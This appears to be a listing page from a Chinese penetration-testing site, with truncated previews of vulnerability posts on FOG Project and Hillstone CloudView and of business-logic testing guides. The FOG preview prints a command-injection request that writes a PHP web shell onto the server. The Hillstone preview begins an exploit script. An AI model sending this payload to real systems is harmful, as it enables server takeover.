秃兔
fogproject系统接口export.php存在远程命令执行漏洞
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
山石网科云鉴存在前台任意命令执行漏洞
import requests”’HSVD-2023-0008”’def setSystemTimeAction(newcsrf,headers): 登录可见余下内容
【渗透文库】业务解约/中止场景业务逻辑测试
测试描述:通过抓包工具分析业务解约/中止场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若该场景涉及人脸、证书、短信验证码等认证要素,请参考对应的认证要素测试方式,...
【渗透文库】金融产品订单取消场景业务逻辑测试
测试描述:通过抓包工具分析金金融产品订单取消场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及人脸、证书、短信验证码等认证要素,请参考对应的认证要素测试对应...
